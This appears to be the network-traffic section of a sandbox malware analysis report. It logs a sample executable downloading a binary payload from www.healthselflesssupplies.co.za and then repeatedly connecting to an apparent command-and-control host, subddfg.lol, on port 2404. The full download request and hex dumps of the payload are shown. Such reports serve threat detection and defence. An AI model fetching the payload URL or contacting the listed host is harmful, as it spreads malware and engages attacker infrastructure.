Jan 10, 2025 20:38:49.528103113 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528146982 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.528161049 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528191090 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528227091 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.528521061 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528537035 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528584003 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.528588057 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528609991 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.528629065 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.531143904 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.531161070 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.531219959 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.531224966 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.531348944 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.531810999 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.531819105 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.531883001 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.531888008 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.531923056 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.613042116 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.613070011 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.613173008 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.613173008 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.613183022 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.613221884 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.752898932 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.752926111 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753011942 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753011942 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753027916 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753103018 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753120899 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753184080 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753184080 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753191948 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753236055 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753408909 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753526926 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753540993 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753591061 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753607035 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753670931 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753909111 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753926992 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.753983021 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.753988028 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754065990 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.754102945 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754122019 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754169941 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.754169941 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.754178047 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754213095 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.754529953 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754545927 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754648924 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.754656076 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754740953 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.754880905 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.754894018 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.755043030 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.755050898 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.755158901 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.757627010 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.757663965 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.757739067 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.757745981 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.757769108 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.757816076 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.839873075 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.839903116 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.839967966 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.839987993 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840025902 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840025902 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840043068 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840061903 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840115070 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840120077 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840245008 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840306997 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840523005 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840569019 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840596914 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840612888 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840692043 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840692043 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840820074 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840859890 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840917110 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840917110 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.840923071 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.840996027 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.841067076 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.841111898 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.841171026 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.841171026 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.841176033 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.841278076 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.841629982 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.841674089 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.841698885 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.841716051 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.841727972 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.841751099 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.979605913 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.979636908 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.979753017 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.979753017 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.979773998 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.979938030 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.979960918 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.979990005 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.979990005 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.979996920 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.980046034 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.980046034 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.980290890 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.980314016 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.980525017 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.980564117 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.980564117 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.980571985 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.980585098 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.980695009 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.980695963 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.980726004 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:53.310959101 CET	49737	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:38:53.315802097 CET	2404	49737	94.156.177.164	192.168.2.4
Jan 10, 2025 20:38:53.315892935 CET	49737	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:38:53.319679022 CET	49737	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:38:53.324491024 CET	2404	49737	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:14.698304892 CET	2404	49737	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:14.698395967 CET	49737	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:14.698465109 CET	49737	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:14.703330040 CET	2404	49737	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:15.707643032 CET	49738	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:15.712723970 CET	2404	49738	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:15.712795019 CET	49738	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:15.717329025 CET	49738	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:15.722161055 CET	2404	49738	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:37.086087942 CET	2404	49738	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:37.086201906 CET	49738	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:37.086276054 CET	49738	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:37.091007948 CET	2404	49738	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:38.095968962 CET	49826	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:38.100869894 CET	2404	49826	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:38.100960970 CET	49826	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:38.104454041 CET	49826	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:38.109217882 CET	2404	49826	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:59.512006998 CET	2404	49826	94.156.177.164	192.168.2.4
Jan 10, 2025 20:39:59.513566971 CET	49826	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:59.513643026 CET	49826	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:39:59.518503904 CET	2404	49826	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:00.517664909 CET	49955	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:00.522469044 CET	2404	49955	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:00.522744894 CET	49955	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:00.526304960 CET	49955	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:00.531078100 CET	2404	49955	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:21.907896996 CET	2404	49955	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:21.908011913 CET	49955	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:21.908080101 CET	49955	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:21.912893057 CET	2404	49955	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:22.924810886 CET	50009	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:22.929706097 CET	2404	50009	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:22.933455944 CET	50009	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:22.936878920 CET	50009	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:22.941657066 CET	2404	50009	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:44.293200970 CET	2404	50009	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:44.295391083 CET	50009	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:44.295488119 CET	50009	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:44.300246954 CET	2404	50009	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:45.299139023 CET	50010	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:45.304045916 CET	2404	50010	94.156.177.164	192.168.2.4
Jan 10, 2025 20:40:45.304120064 CET	50010	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:45.308459044 CET	50010	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:40:45.313293934 CET	2404	50010	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:06.684071064 CET	2404	50010	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:06.685480118 CET	50010	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:06.685673952 CET	50010	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:06.692708015 CET	2404	50010	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:07.689492941 CET	50011	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:07.694324970 CET	2404	50011	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:07.695377111 CET	50011	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:07.698569059 CET	50011	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:07.703351974 CET	2404	50011	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:29.092255116 CET	2404	50011	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:29.092443943 CET	50011	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:29.092443943 CET	50011	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:29.097373962 CET	2404	50011	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:30.096151114 CET	50012	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:30.101115942 CET	2404	50012	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:30.105283976 CET	50012	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:30.110301971 CET	50012	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:30.115065098 CET	2404	50012	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:51.467885971 CET	2404	50012	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:51.468056917 CET	50012	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:51.468117952 CET	50012	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:51.473028898 CET	2404	50012	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:52.470556021 CET	50013	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:52.475625038 CET	2404	50013	94.156.177.164	192.168.2.4
Jan 10, 2025 20:41:52.475712061 CET	50013	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:52.479090929 CET	50013	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:41:52.483899117 CET	2404	50013	94.156.177.164	192.168.2.4
Jan 10, 2025 20:42:13.857531071 CET	2404	50013	94.156.177.164	192.168.2.4
Jan 10, 2025 20:42:13.857615948 CET	50013	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:42:13.857645035 CET	50013	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:42:13.862519026 CET	2404	50013	94.156.177.164	192.168.2.4
Jan 10, 2025 20:42:14.861068010 CET	50014	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:42:14.866482973 CET	2404	50014	94.156.177.164	192.168.2.4
Jan 10, 2025 20:42:14.867399931 CET	50014	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:42:14.870722055 CET	50014	2404	192.168.2.4	94.156.177.164
Jan 10, 2025 20:42:14.875561953 CET	2404	50014	94.156.177.164	192.168.2.4
Jan 10, 2025 20:42:36.233961105 CET	2404	50014	94.156.177.164	192.168.2.4
Jan 10, 2025 20:42:36.234204054 CET	50014	2404	192.168.2.4	94.156.177.164

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:38:46.724633932 CET	65523	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:38:47.147964001 CET	53	65523	1.1.1.1	192.168.2.4
Jan 10, 2025 20:38:53.297907114 CET	59263	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:38:53.310004950 CET	53	59263	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:38:46.724633932 CET	192.168.2.4	1.1.1.1	0x8415	Standard query (0)	www.healthselflesssupplies.co.za	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:38:53.297907114 CET	192.168.2.4	1.1.1.1	0xffde	Standard query (0)	subddfg.lol	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:38:47.147964001 CET	1.1.1.1	192.168.2.4	0x8415	No error (0)	www.healthselflesssupplies.co.za	healthselflesssupplies.co.za		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:38:47.147964001 CET	1.1.1.1	192.168.2.4	0x8415	No error (0)	healthselflesssupplies.co.za		164.160.91.32	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:38:53.310004950 CET	1.1.1.1	192.168.2.4	0xffde	No error (0)	subddfg.lol		94.156.177.164	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.healthselflesssupplies.co.za

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	164.160.91.32	443	180	C:\Users\user\Desktop\IpykYx5iwz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 19:38:48 UTC	193	OUT	GET /gmjzqcQFfx21.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: www.healthselflesssupplies.co.za Cache-Control: no-cache
2025-01-10 19:38:48 UTC	404	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Thu, 12 Dec 2024 05:42:22 GMT accept-ranges: bytes content-length: 493120 date: Fri, 10 Jan 2025 19:38:48 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-01-10 19:38:48 UTC	964	IN	Data Raw: c8 f3 2e eb 7c f5 36 f1 ae a0 30 ed 58 9a 1f a1 4a aa 9d 4c c5 be 96 c5 2d 2b 24 a3 4f 4e f5 aa e0 80 80 7b 9e e4 58 1f de 86 b8 31 84 30 1b 6d 67 a5 a7 27 73 79 66 1d bc 44 56 1d b4 0e d0 46 1c 5e f4 d6 f6 10 57 02 15 b4 cb 19 e6 8f fe e9 25 e6 d6 9a fe 5f 36 49 c3 9e 56 06 55 e7 b9 b8 76 26 92 78 cd dd d5 9e 71 63 6b 0f 2b 2d a5 67 f0 5b 6b 6a 7a e5 ff 4c ae b5 2d 36 82 23 2e 6a e4 4a 07 b3 8c 16 cf 99 e6 4a d1 69 dd ed 59 9c 5e 96 c9 16 77 e1 82 55 b4 44 d3 8d c1 09 b1 a3 14 fd af e5 2f 24 ea 65 15 8b 36 46 de 09 82 1f 01 d1 c8 c3 4f 2f 44 96 f3 ae 69 cb f3 60 76 37 c1 67 ec ea e7 21 8d 38 dc 5a 71 75 3f 05 60 6f e2 82 a6 22 c3 88 98 84 d5 f9 cf 22 e8 72 98 1c fb 4a 9c 0c 8a 6d 40 e2 04 95 f0 bb 7e 27 79 47 24 78 83 77 b1 34 c1 73 9c ee aa 04 a7 3b c6 Data Ascii: .\|60XJL-+$ON{X10mg'syfDVF^W%_6IVUv&xqck+-g[kjzL-6#.jJJiY^wUD/$e6FO/Di`v7g!8Zqu?`o""rJm@~'yG$xw4s;
2025-01-10 19:38:49 UTC	14994	IN	Data Raw: 72 76 6d 6e 39 33 86 b8 1f da d3 d6 3b e9 20 58 68 2d d0 57 9b e8 47 91 0d 8c 74 67 f3 76 cb 61 1d 49 d1 b6 88 95 78 f7 a5 22 e2 0c af da 4b b0 0a 80 8f 8b 83 d6 7b e2 a7 08 72 00 e8 e2 1f 64 ab 0e 2e 8a 43 01 d9 d8 77 94 df f8 e0 7e 09 d3 33 cc 5c d0 31 b9 a5 7c 17 d5 87 75 64 d6 11 39 cb 51 6f 56 c6 f1 07 0d 09 81 8c 80 93 c6 fb 71 36 82 5a 3b 8b 89 b3 be 19 53 cb ce 3c 36 c6 1a fd 2b dc 63 8d 9e e2 d3 cf f2 04 c7 f5 0a 57 65 0d 73 5e c1 38 ad 2e 31 46 82 6c 05 48 60 80 f6 bc c1 dc 79 41 d7 cb 44 ee c5 39 23 d6 1d 64 58 02 11 dc 74 75 5c 70 16 8c b5 e5 d6 c3 3d 35 76 a1 fc b6 55 06 0c 44 29 85 31 26 51 29 9c 35 ef 93 71 63 03 c6 47 68 a5 8f b4 73 68 6a 23 26 95 4c 17 0d 10 71 8a ca 62 5a ea 55 d5 5d e0 e7 c6 bc eb da d3 25 49 0f b4 cc 09 a2 e9 8e 20 81 Data Ascii: rvmn93; Xh-WGtgvaIx"K{rd.Cw~3\1\|ud9QoVq6Z;S<6+cWes^8.1FlH`yAD9#dXtu\p=5vUD)1&Q)5qcGhshj#&LqbZU]%I
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: 9b 22 9f 27 1d a1 97 63 77 6a 90 96 f9 23 e2 8f 6b ea c6 fc 2e a0 67 32 57 29 84 24 a2 2c 34 47 e8 e2 26 59 b7 48 69 8a 37 4f 59 e5 52 d2 98 f8 e0 0a 4c 5e 77 e8 4c 80 ce ac 79 0e 52 d5 04 99 7c 5b 5d 1d f3 da b8 dd 32 19 e5 6f 08 81 dc 0b 46 4d 35 99 06 80 5a 3b 08 65 a7 35 d5 3b 9f 9a c3 56 13 b4 29 3c 6b 85 89 c2 8b 78 20 73 34 a2 28 06 74 8d 08 64 18 46 86 cf 0e 9f 8b 8d 6c b5 21 13 e9 96 fa 6e a7 50 cb ea 8e c1 10 51 ef 66 e4 35 4f 09 5f 92 70 e7 db 1d 70 a8 62 6c 66 a8 c6 fe 2b 6b c9 ff ba 5e 06 20 c1 3a 54 6e ad 5e 10 21 89 93 9e 99 f5 bf f0 d4 ae 49 7f 7b 97 03 7a 2f a3 ff a4 29 61 d2 c9 62 80 75 6b ea d6 79 8d bf 62 96 04 97 a2 2f 30 c8 be 48 f4 c8 93 89 ef 43 ea 1a 32 31 5b b6 ee ca 98 20 ba 04 22 d8 6c 7d 13 9f f4 43 86 a7 73 62 34 94 3f dc bf Data Ascii: "'cwj#k.g2W)$,4G&YHi7OYRL^wLyR\|[]2oFM5Z;e5;V)<kx s4(tdFl!nPQf5O_ppblf+k^ :Tn^!I{z/)abukyb/0HC21[ "l}Csb4?
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: df 07 8e c6 aa c3 9c cb 70 9e 79 53 89 bd 1f 0e a5 75 41 b8 c0 00 e5 4a 01 c1 5c b1 3f a3 c7 63 5a b4 cd 54 d0 82 92 fd 82 b4 ec b0 db 57 57 4f 74 2d ef c5 a3 48 40 89 4e 3e b2 79 cf aa d8 bd ed cf b2 a6 c6 5b e8 ae d7 78 49 04 8f a6 32 fd 88 d9 64 cb ec 2d 9c de 92 07 aa 90 e1 df cf 2c be 80 31 f1 61 3a d9 97 54 25 79 32 9b ed ef a9 da 01 1a 34 b1 13 dc 86 67 00 78 60 02 76 7d d8 0f 28 f3 e6 e5 c7 77 4d 0c 17 96 f9 73 03 49 37 28 e5 51 9c ad 52 e3 e3 5e 51 bc e4 b1 02 14 5d 89 b3 6a 51 df a4 28 68 9f 8e 8d fc 92 b0 83 18 0a cf 08 ea 4f ec 9b e4 cc 69 1b 28 07 6d 53 2d 1b 70 59 b4 be 45 c0 0d 9f 99 13 ee 5c ed 2c 37 b8 5a 95 96 71 82 72 9a 50 f7 28 01 f4 8f c2 9e 19 50 0f bf 48 24 d6 ed bd 85 22 ba be 3d 7e 59 3f 48 b3 24 bb 8f de 66 35 2a 46 74 62 08 79 Data Ascii: pySuAJ\?cZTWWOt-H@N>y[xI2d-,1a:T%y24gx`v}(wMsI7(QR^Q]jQ(hOi(mS-pYE\,7ZqrP(PH$"=~Y?H$f5*Ftby
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: cc 2c 12 50 6e cf d1 26 07 34 ec 2d b7 27 93 76 f6 7a 9b 39 d3 f5 46 ed 26 16 b4 58 d6 9f b8 05 6f 7e 20 d2 da e5 98 30 5b a1 eb d3 de da 31 cb 31 27 11 58 e6 93 3d 17 81 cd 3a ca 39 01 47 c0 69 e0 e0 32 1a 4e d5 e5 ca 18 53 2f af 0e 06 d4 2c dc a1 29 a0 03 34 b1 9d 62 08 42 47 1d 5a 7c 0c bf 48 04 08 b7 1c f5 01 39 df e0 bf 17 00 a7 ea 8d 97 77 26 28 a3 38 cd 28 4d 7a af e4 ea fb cd 41 94 a7 48 a8 fc f8 eb 50 1c bf e9 70 aa 31 c4 53 fe a5 27 6f 83 94 34 35 be 52 f2 f7 79 c7 de ba f3 2a 12 d0 a1 75 8c 78 69 88 4b 25 07 9b 01 06 e7 d7 d0 66 f5 d1 ae 9c 41 d8 37 50 c3 47 e7 62 2e 10 77 0d c4 7c b6 97 1a 0c 6a 9e d8 5d f3 2a 61 41 69 1a 51 4b 42 97 2a 1b 5a 1b fd d8 23 b5 40 22 95 aa 2d a7 39 59 ee 49 ab 44 1c 22 b4 e4 2e 4f 7f a0 f9 01 00 61 1e 64 06 4a 7d Data Ascii: ,Pn&4-'vz9F&Xo~ 0[11'X=:9Gi2NS/,)4bBGZ\|H9w&(8(MzAHPp1S'o45RyuxiK%fA7PGb.w\|j]aAiQKB*Z#@"-9YID".OadJ}
